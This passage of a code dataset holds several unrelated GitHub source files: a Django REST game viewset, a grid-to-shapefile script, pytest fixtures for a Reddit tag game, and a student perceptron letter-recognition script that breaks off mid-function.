status=status.HTTP_200_OK)\n raise ValidationError({ 'detail': 'not registered'})\n\n\n def player_list(self, request, pk=None):\n game = self.get_game_or_error(pk)\n players = models.Player.objects.filter(game_id=pk)\n serializer = serializers.PlayerSerializer(players, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def start(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY)\n player = self.get_request_user_is_game_player_or_400(request, game)\n players = models.Player.objects.filter(game_id=pk)\n if players:\n helper = logic.Start(game, players)\n helper.process()\n serializer = serializers.GameSerializer(game)\n return Response(serializer.data)\n raise ValidationError({ 'detail': 'no players'})\n\n @action(detail=True, methods=['get'])\n def pieces(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.LOBBY, False)\n pieces = models.GamePiece.objects.filter(game_id=pk).order_by('order')\n serializer = serializers.GamePieceSerializer(pieces, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def rotatesparesquare(self, request, pk=None):\n game = 
self.get_game_or_error(pk, models.Game.INPROGRESS)\n self.get_request_user_is_current_player_or_400(request, game)\n helper = logic.RotateSpareSquare(pk)\n return helper.process()\n\n @action(detail=True, methods=['post'])\n def insertsparesquare(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n current_player = self.get_request_user_is_current_player_or_400(request, game)\n insert_into = request.data.get('insert_into', False)\n insert_at = request.data.get('insert_at', False)\n helper = logic.InsertSpareSquare(game, current_player, insert_into, insert_at)\n helper.process()\n game_pieces = models.GamePiece.objects.filter(game_id=pk).order_by('order')\n serializer = serializers.GamePieceSerializer(game_pieces, many=True)\n return Response(serializer.data)\n\n\n @action(detail=True, methods=['get'])\n def collectableitems(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n items = models.CollectableItem.objects.filter(gamepiece__game_id = pk)\n serializer = serializers.CollectableItemSerializer(items, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def finishturn(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n current_player = self.get_request_user_is_current_player_or_400(request, game)\n helper = logic.FinishTurn(game, current_player)\n helper.process()\n players = models.Player.objects.filter(game_id = pk)\n serializer = serializers.PlayerSerializer(players, many=True)\n return Response(serializer.data)\n\n @action(detail=True, methods=['post'])\n def movecounter(self, request, pk=None):\n game = self.get_game_or_error(pk, models.Game.INPROGRESS)\n player = self.get_request_user_is_current_player_or_400(request, game)\n helper = logic.MoveCounter(request, pk, player)\n helper.process()\n serializer = serializers.PlayerSerializer(player, many=False)\n return Response({ 'data': serializer.data })\n\n\n def get_game_or_error(self, pk, status=None, is_equal=True):\n game = get_object_or_404(models.Game, pk=pk)\n if status == None:\n return game\n if is_equal and game.status == status:\n return game\n elif not is_equal and game.status != status:\n return game\n else:\n raise ValidationError({ 'detail': 'operation not allowed on game at this time.'})\n\n def get_request_user_is_current_player_or_400(self, request, game):\n if game.current_player.user == request.user:\n return game.current_player\n else:\n raise ValidationError({ 'detail': 'not current player' })\n\n def get_request_user_is_game_player_or_400(self, request, game):\n player = models.Player.objects.filter(game_id=game.id, user_id=request.user.id)\n if not player:\n raise ValidationError({ 'detail': 'not a player of the given game' })\n return player\n\nclass ShapeViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.GamePieceShape.objects.all()\n serializer_class = serializers.GamePieceShapeSerializer\n pagination_class = None\n\nclass OrientationViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.GamePieceOrientation.objects.all()\n serializer_class = serializers.GamePieceOrientationSerializer\n pagination_class = None\n\nclass CollectableItemViewSet(viewsets.ReadOnlyModelViewSet):\n queryset = models.CollectableItem.objects.all()\n serializer_class = serializers.CollectableItemSerializer\n", "repo_name": "alexc-royle/drf-channels-labyrinth", "sub_path": "backend/game/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 6783, "program_lang": 
"python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "41", "api": [{"api_name": "rest_framework.viewsets.ModelViewSet", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 13, "usage_type": "name"}, {"api_name": "rest_framework.decorators.action", "line_number": 18, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 35, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 35, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 35, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 36, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 44, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 44, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 44, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 45, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 52, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 63, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 64, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 54, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 71, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 66, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 73, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 90, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 80, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 98, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 93, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 108, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 100, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 117, "usage_type": "call"}, {"api_name": "rest_framework.decorators.action", "line_number": 110, "usage_type": "call"}, {"api_name": "django.shortcuts.get_object_or_404", "line_number": 121, "usage_type": "call"}, {"api_name": "rest_framework.status", "line_number": 122, "usage_type": "name"}, {"api_name": "rest_framework.status", "line_number": 124, "usage_type": "name"}, {"api_name": "rest_framework.status", "line_number": 126, "usage_type": "name"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 129, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 135, "usage_type": "call"}, {"api_name": "rest_framework.exceptions.ValidationError", "line_number": 140, "usage_type": "call"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 143, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 143, "usage_type": "name"}, {"api_name": "rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 148, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 148, "usage_type": "name"}, {"api_name": 
"rest_framework.viewsets.ReadOnlyModelViewSet", "line_number": 153, "usage_type": "attribute"}, {"api_name": "rest_framework.viewsets", "line_number": 153, "usage_type": "name"}]} +{"seq_id": "14534065577", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis Scipt load an .nc grid \nWrite a shapefiles of the Edges and one of w node depth\n\n\"\"\"\n\nfrom stompy.grid import unstructured_grid\nimport matplotlib.pyplot as plt\nfrom stompy.model.delft import dfm_grid\n\n##\nnc_gride='E:/proj/Pescadero/pescadero_model/grids/pesca_butano_v03/pesca_butano_existing_deep_bathy.nc'\n#nc_grida='E:/proj/Pescadero/pescadero_model/grids/pesca_butano_v01/pesca_butano_v01_asbuilt_bathy.nc'\nout_dir = 'E:/proj/Pescadero/GIS_files'\n\n\nge=unstructured_grid.UnstructuredGrid.from_ugrid(nc_gride)\n#ga=unstructured_grid.UnstructuredGrid.from_ugrid(nc_grida)\n\nplt.figure(1).clf()\nge.plot_edges(color='k',lw=0.5)\nge.plot_cells(values=ge.cells_area(), cmap='jet')\n\n\n\n##\n\n# write just the edges as a shapefile.\nge.write_edges_shp(out_dir+'/Mesh/pesca_butano_v03_existing.shp')\n#ga.write_edges_shp(out_dir+'/Mesh/pesca_butano_v01_asbuilt.shp')\n\n\nplt.figure(3).clf()\nge.plot_nodes(values=ge.nodes['node_z_bed'],cmap='jet',vmin=-10,vmax=5)\n#ge.plot_nodes(values=ge.nodes['mesh2d_node_z'],cmap='jet',vmin=-10,vmax=5)\nge.write_nodes_shp(out_dir+'/Mesh/pesca_butano_v03_existing_node_w_depth.shp')\n#ga.write_nodes_shp(out_dir+'/Mesh/pesca_butano_v01_asbuilt_node_w_depth.shp')\n\n#%%\n\n\n\n\n", "repo_name": "rustychris/pescadero_model", "sub_path": "model/sophie_scrips/Make_shp_from_nc.py", "file_name": "Make_shp_from_nc.py", "file_ext": "py", "file_size_in_byte": 1238, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "41", "api": [{"api_name": "stompy.grid.unstructured_grid.UnstructuredGrid.from_ugrid", "line_number": 20, "usage_type": "call"}, {"api_name": "stompy.grid.unstructured_grid.UnstructuredGrid", "line_number": 20, "usage_type": "attribute"}, {"api_name": "stompy.grid.unstructured_grid", "line_number": 20, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "42697147093", "text": "import asyncio\nfrom typing import Generator\n\nimport pytest\nimport pytest_asyncio\nfrom asyncpraw import Reddit\nfrom faker import Faker\nfrom httpx import AsyncClient\nfrom sqlalchemy.ext.asyncio import AsyncSession\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlmodel import SQLModel\nfrom starlette.testclient import TestClient\n\nfrom src.clients.reddit.inbox import InboxClient\nfrom src.main import app\nfrom src.models.player import Player\nfrom src.models.subreddit import SubReddit\nfrom src.repositories.game import GameRepository\nfrom src.repositories.player import PlayerRepository\nfrom src.repositories.sqlalchemy import BaseSQLAlchemyRepository\nfrom src.repositories.subreddit import SubRedditRepository\nfrom src.services.base import BaseService\nfrom src.services.game import GameService\nfrom src.services.player import PlayerService\nfrom src.services.subreddit import SubRedditService\nfrom src.services.tag import TagService\nfrom tests.unit import test_redditor_one, test_subreddit\nfrom tests.utils import test_engine\n\n\nfake = 
Faker()\n\n\n@pytest.fixture(scope=\"module\")\ndef test_app():\n client = TestClient(app)\n yield client # testing happens here\n\n\n@pytest_asyncio.fixture(scope=\"module\")\nasync def async_test_app():\n async with AsyncClient(app=app, base_url=\"http://test\") as client:\n yield client\n\n\n@pytest.fixture(scope=\"session\")\ndef event_loop(request) -> Generator: # noqa: indirect usage\n loop = asyncio.get_event_loop_policy().new_event_loop()\n yield loop\n loop.close()\n\n\n@pytest_asyncio.fixture(scope=\"function\")\nasync def async_session() -> AsyncSession:\n async_test_session = sessionmaker(test_engine, class_=AsyncSession, expire_on_commit=False)\n\n async with async_test_session() as s:\n async with test_engine.begin() as conn:\n await conn.run_sync(SQLModel.metadata.create_all)\n\n yield s\n\n async with test_engine.begin() as conn:\n await conn.run_sync(SQLModel.metadata.drop_all)\n\n await test_engine.dispose()\n\n\n@pytest.fixture\ndef game_repo(async_session: AsyncSession) -> BaseSQLAlchemyRepository:\n return GameRepository(db=async_session)\n\n\n@pytest.fixture\ndef sub_repo(async_session: AsyncSession) -> BaseSQLAlchemyRepository:\n return SubRedditRepository(db=async_session)\n\n\n@pytest.fixture\ndef player_repo(async_session: AsyncSession) -> BaseSQLAlchemyRepository:\n return PlayerRepository(db=async_session)\n\n\n@pytest.fixture\ndef mock_game_service(game_repo: BaseSQLAlchemyRepository) -> BaseService:\n return GameService(repo=game_repo)\n\n\n@pytest.fixture\ndef mock_sub_service(sub_repo: BaseSQLAlchemyRepository) -> BaseService:\n return SubRedditService(repo=sub_repo)\n\n\n@pytest.fixture\ndef mock_player_service(player_repo: BaseSQLAlchemyRepository) -> BaseService:\n return PlayerService(repo=player_repo)\n\n\n@pytest.fixture\ndef mock_tag_service(\n mock_player_service: BaseService, mock_game_service: BaseService, mock_sub_service: BaseService\n) -> TagService:\n return TagService(mock_player_service, mock_game_service, mock_sub_service)\n\n\n# TODO: add base fields here?\n@pytest.fixture\ndef player() -> Player:\n return Player(\n username=test_redditor_one[\"name\"],\n reddit_id=test_redditor_one[\"id\"],\n icon_img=test_redditor_one[\"icon_img\"],\n is_employee=test_redditor_one[\"is_employee\"],\n created_utc=test_redditor_one[\"created_utc\"],\n verified=False,\n is_suspended=False,\n has_verified_email=True,\n )\n\n\n@pytest.fixture\ndef fake_player() -> Player:\n return Player(\n username=fake.first_name().lower(),\n reddit_id=fake.word(),\n icon_img=fake.image_url(),\n is_employee=fake.boolean(),\n created_utc=fake.unix_time(),\n verified=fake.boolean(),\n is_suspended=False,\n has_verified_email=fake.boolean(),\n )\n\n\n@pytest.fixture\ndef it_player() -> Player:\n return Player(\n username=\"iamitplayer\",\n reddit_id=\"testid\",\n icon_img=test_redditor_one[\"icon_img\"],\n is_employee=test_redditor_one[\"is_employee\"],\n created_utc=test_redditor_one[\"created_utc\"],\n verified=False,\n is_suspended=False,\n has_verified_email=True,\n is_it=True,\n )\n\n\n@pytest.fixture\ndef subreddit() -> SubReddit:\n return SubReddit(\n name=test_subreddit[\"name\"],\n sub_id=test_subreddit[\"id\"],\n display_name=test_subreddit[\"display_name\"],\n created_utc=test_subreddit[\"created_utc\"],\n description=test_subreddit[\"description\"],\n description_html=test_subreddit[\"description_html\"],\n over18=test_subreddit[\"over18\"],\n subscribers=test_subreddit[\"subscribers\"],\n icon_img=test_subreddit[\"icon_img\"],\n )\n\n\n@pytest.fixture\nasync def 
reddit():\n \"\"\"Mock Reddit instance\"\"\"\n async with Reddit(client_id=\"dummy\", client_secret=\"dummy\", user_agent=\"dummy\") as reddit:\n # Unit tests should never issue requests\n reddit._core.request = dummy_request\n yield reddit\n\n\nasync def dummy_request(*args, **kwargs):\n pass\n\n\n@pytest.fixture\ndef mock_inbox_client(reddit):\n return InboxClient(reddit=reddit)\n", "repo_name": "nickatnight/tag-youre-it-backend", "sub_path": "backend/tests/unit/conftest.py", "file_name": "conftest.py", "file_ext": "py", "file_size_in_byte": 5148, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 14, "dataset": "github-code", "pt": "41", "api": [{"api_name": "faker.Faker", "line_number": 31, "usage_type": "call"}, {"api_name": "starlette.testclient.TestClient", "line_number": 36, "usage_type": "call"}, {"api_name": "src.main.app", "line_number": 36, "usage_type": "argument"}, {"api_name": "pytest.fixture", "line_number": 34, "usage_type": "call"}, {"api_name": "httpx.AsyncClient", "line_number": 42, "usage_type": "call"}, {"api_name": "src.main.app", "line_number": 42, "usage_type": "name"}, {"api_name": "pytest_asyncio.fixture", "line_number": 40, "usage_type": "call"}, {"api_name": "asyncio.get_event_loop_policy", "line_number": 48, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 46, "usage_type": "call"}, {"api_name": "typing.Generator", "line_number": 47, "usage_type": "name"}, {"api_name": "sqlalchemy.orm.sessionmaker", "line_number": 55, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 55, "usage_type": "argument"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 55, "usage_type": "name"}, {"api_name": "tests.utils.test_engine.begin", "line_number": 58, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 59, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 59, "usage_type": "name"}, {"api_name": "tests.utils.test_engine.begin", "line_number": 63, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 63, "usage_type": "name"}, {"api_name": "sqlmodel.SQLModel.metadata", "line_number": 64, "usage_type": "attribute"}, {"api_name": "sqlmodel.SQLModel", "line_number": 64, "usage_type": "name"}, {"api_name": "tests.utils.test_engine.dispose", "line_number": 66, "usage_type": "call"}, {"api_name": "tests.utils.test_engine", "line_number": 66, "usage_type": "name"}, {"api_name": "pytest_asyncio.fixture", "line_number": 53, "usage_type": "call"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 54, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 70, "usage_type": "name"}, {"api_name": "src.repositories.game.GameRepository", "line_number": 71, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 69, "usage_type": "attribute"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 70, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", "line_number": 75, "usage_type": "name"}, {"api_name": "src.repositories.subreddit.SubRedditRepository", "line_number": 76, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 74, "usage_type": "attribute"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 75, "usage_type": "name"}, {"api_name": "sqlalchemy.ext.asyncio.AsyncSession", 
"line_number": 80, "usage_type": "name"}, {"api_name": "src.repositories.player.PlayerRepository", "line_number": 81, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 79, "usage_type": "attribute"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 80, "usage_type": "name"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 85, "usage_type": "name"}, {"api_name": "src.services.game.GameService", "line_number": 86, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 84, "usage_type": "attribute"}, {"api_name": "src.services.base.BaseService", "line_number": 85, "usage_type": "name"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 90, "usage_type": "name"}, {"api_name": "src.services.subreddit.SubRedditService", "line_number": 91, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 89, "usage_type": "attribute"}, {"api_name": "src.services.base.BaseService", "line_number": 90, "usage_type": "name"}, {"api_name": "src.repositories.sqlalchemy.BaseSQLAlchemyRepository", "line_number": 95, "usage_type": "name"}, {"api_name": "src.services.player.PlayerService", "line_number": 96, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 94, "usage_type": "attribute"}, {"api_name": "src.services.base.BaseService", "line_number": 95, "usage_type": "name"}, {"api_name": "src.services.base.BaseService", "line_number": 101, "usage_type": "name"}, {"api_name": "src.services.tag.TagService", "line_number": 103, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 99, "usage_type": "attribute"}, {"api_name": "src.services.tag.TagService", "line_number": 102, "usage_type": "name"}, {"api_name": "src.models.player.Player", "line_number": 109, "usage_type": "call"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 110, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 111, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 112, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 113, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 114, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 107, "usage_type": "attribute"}, {"api_name": "src.models.player.Player", "line_number": 108, "usage_type": "name"}, {"api_name": "src.models.player.Player", "line_number": 123, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 121, "usage_type": "attribute"}, {"api_name": "src.models.player.Player", "line_number": 122, "usage_type": "name"}, {"api_name": "src.models.player.Player", "line_number": 137, "usage_type": "call"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 140, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 141, "usage_type": "name"}, {"api_name": "tests.unit.test_redditor_one", "line_number": 142, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 135, "usage_type": "attribute"}, {"api_name": "src.models.player.Player", "line_number": 136, "usage_type": "name"}, {"api_name": "src.models.subreddit.SubReddit", "line_number": 152, "usage_type": "call"}, {"api_name": "tests.unit.test_subreddit", "line_number": 153, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 154, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 155, 
"usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 156, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 157, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 158, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 159, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 160, "usage_type": "name"}, {"api_name": "tests.unit.test_subreddit", "line_number": 161, "usage_type": "name"}, {"api_name": "pytest.fixture", "line_number": 150, "usage_type": "attribute"}, {"api_name": "src.models.subreddit.SubReddit", "line_number": 151, "usage_type": "name"}, {"api_name": "asyncpraw.Reddit", "line_number": 168, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 165, "usage_type": "attribute"}, {"api_name": "src.clients.reddit.inbox.InboxClient", "line_number": 180, "usage_type": "call"}, {"api_name": "pytest.fixture", "line_number": 178, "usage_type": "attribute"}]} +{"seq_id": "35427846935", "text": "# Robert Kramer\n# Machine Learning Winter 2016\n# Perceptron Neural Network using letter recognition\n# dataset from http://archive.ics.uci.edu/ml/datasets/\n# Letter+Recognition\n\n# Capital letters denote vectors or matrices\n# X is input Matrix (row vectors), W is a weight vector, T is a\n# target vector. \"per\" is short for perceptron\n\n# %%\nimport numpy as np\nimport pandas as pd\nimport itertools\nimport matplotlib.pyplot as plt\n\n\n# %%\n# using dataframe in pandas because of familiarity with R\n# would like help refactoring to a more generalizable form\n# import data; split into train and test; normalize, name, add bias\nlet_rec_df = pd.read_csv('letter-recognition.csv', header=None)\ntrain = let_rec_df.iloc[0:10000, :]\ntest = let_rec_df.iloc[10000:, :]\ndel let_rec_df # Removing for memory\ntrain.columns = ['target', 'x1', 'x2', 'x3', 'x4',\n 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11',\n 'x12', 'x13', 'x14', 'x15', 'x16']\ntest.columns = ['target', 'x1', 'x2', 'x3', 'x4',\n 'x5', 'x6', 'x7', 'x8', 'x9', 'x10', 'x11',\n 'x12', 'x13', 'x14', 'x15', 'x16']\ntrain.iloc[:, 1:] = train.iloc[:, 1:]/15\ntest.iloc[:, 1:] = test.iloc[:, 1:]/15\ntrain.insert(1, 'x0', 1) # bias input --> 17 wieghts needed\ntest.insert(1, 'x0', 1)\n# using itertools to generate the 325 perceptron names\n# todo --> gerneralize for any target column\nalphabet = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'\nper_names = list(itertools.combinations(alphabet, 2))\neta = .2 # given\n\n\n# %%\n# makes a list of column names for perceptron DF.\ndef col_names(per_names):\n col_names = []\n for e in per_names:\n col_names.append(e[0]+e[1])\n return col_names\n\n\n# %%\n# grab_data takes the target from the pernames list and returns the\n# correct subset of the data.\n# input a list element with targets and data. Output dataframe of subset\n# using a boolean array to choose. Could do separate, but this should add\n# some stocasticity and is easier. \"All pairs\" method. 
# %%\n# pair_data takes the two target letters from a per_names element and returns the\n# matching subset of the data.\n# input: a list element with the targets, plus the data. Output: dataframe of the subset,\n# chosen with a boolean array. Could do two separate selections, but this should add\n# some stochasticity and is easier. The \"all pairs\" method sets targets to 1, -1\ndef pair_data(per_name_element, training_df):\n    tar1 = training_df['target'] == per_name_element[0]\n    tar2 = training_df['target'] == per_name_element[1]\n    paired_data = training_df[tar1 | tar2]\n    return paired_data\n\n\n# %%\n# Takes in paired data and returns a column vector of target answers\ndef get_T(per_name_element, paired_data):\n    T = np.empty([len(paired_data), 1])\n    for i in range(len(paired_data)):\n        if paired_data.iloc[i, 0] == per_name_element[0]:\n            T[i] = 1\n        else:\n            T[i] = -1\n    return T\n\n\n# %%\n# returns a matrix X\ndef get_X(paired_data):\n    X = paired_data.iloc[:, 1:]\n    X = X.as_matrix()\n    return X\n\n\n# %%\n# returns a column vector of weights using the size of inputs\n# doesn't change for this dataset. Could hard-code\ndef get_ini_W(X):\n    W = np.reshape(np.random.rand(X.shape[1]),\n                   (X.shape[1], 1))\n    W = W*2-1\n    return W\n\n\n# %%\n# takes in the X dot W values and replaces them with a target estimate\n# only works with arrays; y / abs(y) works better\n# Y is a vector of perceptron predictions \"neuron fire\"\ndef fire(X, W):\n    Y = np.dot(X, W)\n    Y = Y/abs(Y)\n    return Y\n\n\n# %%\n# takes in the target T, weights W, prediction Y; returns accuracy\n# of a single perceptron's pairwise prediction\ndef accuracy(X, W, T):\n    Y = fire(X, W)\n    Z = abs((T + Y)/2) # Z is a dummy vector\n    acc = sum(Z)/len(Y)\n    return acc[0]\n\n\n# %%\n# update weights w if w dot x does not correctly predict t\n# all arrays\ndef train_epoch(eta, W, X, T):\n    for i in range(len(X)):\n        y = fire(X[i], W)[0]\n        if y != T[i][0]:\n            W = W + eta*T[i][0]*X[i].reshape(len(X[0]),1) # need Xi as col vec\n    return W\n\n\n# %%\n# train a pairwise perceptron\ndef train_perceptron(eta, W, X, T):\n    acc = 0\n    i = 0\n    while accuracy(X, W, T)-acc >= 0 and i < 10:\n        # print W[0:3]\n        # print acc\n        acc = accuracy(X, W, T)\n        W = train_epoch(eta, W, X, T)\n        i += 1\n    return W\n\n\n# %% Make sure a dataframe exists to add weights to\ndef build_network(per_names, eta, training_df):\n    network = pd.DataFrame()\n    for e in per_names:\n        paired_data = pair_data(e, training_df)\n        T = get_T(e, paired_data)\n        X = get_X(paired_data)\n        W = get_ini_W(X)\n        W = train_perceptron(eta, W, X, T)\n        network[e[0]+e[1]] = W[:, 0]\n    return network\n\n\n# %%\n# get_trans gives the transformation matrix: the weights\n# multiplied with the X inputs. makes a data frame for easy reading\n# Used to check reasonableness. Needs the column names to have been built;\n# could get the names from network instead\ndef get_trans(network, test_data):\n    X = get_X(test_data)\n    col_names = list(network.columns.values)\n    trans = np.dot(X, network)\n    trans = pd.DataFrame(data=trans, columns=col_names)\n    return trans\n\n\ndef get_trans_fired(network, test_data):\n    X = get_X(test_data)\n    col_names = list(network.columns.values)\n    trans_fired = fire(X, network)\n    trans_fired = pd.DataFrame(data=trans_fired, columns=col_names)\n    #trans_fired.insert(0, 'target', test_data['target']) # inserts target\n    return trans_fired\n\n\n# %% adding the predicted letter for each perceptron\n# takes forever. Okay for a few predictions\ndef get_trans_w_predict(network, test_data):\n    trans_fired = get_trans_fired(network, test_data)\n    for i in range(len(test_data)):\n        j = 0\n        for e in network:\n            if trans_fired.iloc[i, j] == 1:\n                trans_fired.iloc[i, j] = e[0]\n            else:\n                trans_fired.iloc[i, j] = e[1]\n            j += 1\n    return trans_fired\n\n
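The sample-by-sample loop in train_epoch above implements the classic perceptron rule w <- w + eta * t_i * x_i on misclassified rows. A hedged NumPy sketch of the same rule follows; note it batches all updates from one pass, so it is not numerically identical to the sequential version.

import numpy as np

def train_epoch_batched(eta, W, X, T):
    # X is (n, d), W is (d, 1), T is (n, 1) with entries in {-1, +1}
    Y = np.sign(X @ W)                     # current +/-1 predictions
    wrong = (Y != T).ravel()               # rows the weights misclassify
    update = (X[wrong] * T[wrong]).sum(axis=0, keepdims=True)
    return W + eta * update.T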
# %%\n# Voting. The max(set(list), key=list.count) one\n# doesn't randomize ties\ndef pick_winner(predict_list):\n    As = predict_list.count('A')\n    Bs = predict_list.count('B')\n    Cs = predict_list.count('C')\n    Ds = predict_list.count('D')\n    Es = predict_list.count('E')\n    Fs = predict_list.count('F')\n    Gs = predict_list.count('G')\n    Hs = predict_list.count('H')\n    Is = predict_list.count('I')\n    Js = predict_list.count('J')\n    Ks = predict_list.count('K')\n    Ls = predict_list.count('L')\n    Ms = predict_list.count('M')\n    Ns = predict_list.count('N')\n    Os = predict_list.count('O')\n    Ps = predict_list.count('P')\n    Qs = predict_list.count('Q')\n    Rs = predict_list.count('R')\n    Ss = predict_list.count('S')\n    Ts = predict_list.count('T')\n    Us = predict_list.count('U')\n    Vs = predict_list.count('V')\n    Ws = predict_list.count('W')\n    Xs = predict_list.count('X')\n    Ys = predict_list.count('Y')\n    Zs = predict_list.count('Z')\n    count_list = [As, Bs, Cs, Ds, Es, Fs, Gs, Hs, Is, Js, Ks, Ls,\n                  Ms, Ns, Os, Ps, Qs, Rs, Ss, Ts, Us, Vs, Ws, Xs,\n                  Ys, Zs]\n    # I realize this is an inefficient way, but I'm in too deep\n    list_map = ['A', 'B', 'C', 'D', 'E', 'F', 'G',\n                'H', 'I', 'J', 'K', 'L', 'M', 'N',\n                'O', 'P', 'Q', 'R', 'S', 'T', 'U',\n                'V', 'W', 'X', 'Y', 'Z']\n    var = 0 # placeholder\n    for i in range(len(count_list)):\n        if count_list[i] > count_list[var]:\n            var = i\n        if count_list[i] == count_list[var]:\n            if np.random.randint(0, 2) == 0:\n                var = i\n    return list_map[var]\n\n\n# %%\n# not working --> returns either A or Z (I don't know why; does any of it work?)\ndef predict(network, test_data):\n    X = get_X(test_data)\n    fired_per = fire(X, network)\n    P = []\n    for i in range(len(test_data)):\n        j = 0\n        predict_list = []\n        for e in network:\n            if fired_per[i][j] == 1:\n                predict_list.append(e[0])\n            else:\n                predict_list.append(e[1])\n            j += 1\n        P.append(pick_winner(predict_list))\n        #P.append(max(set(predict_list), key=predict_list.count)) # from stack\n    return P\n\n\n# %%\n# takes in list of predictions and a series of targets\n# returns accuracy as decimal\ndef predict_accuracy(pred_list, target):\n    target = list(target)\n    count = 0\n    for i in range(len(pred_list)):\n        if pred_list[i] == 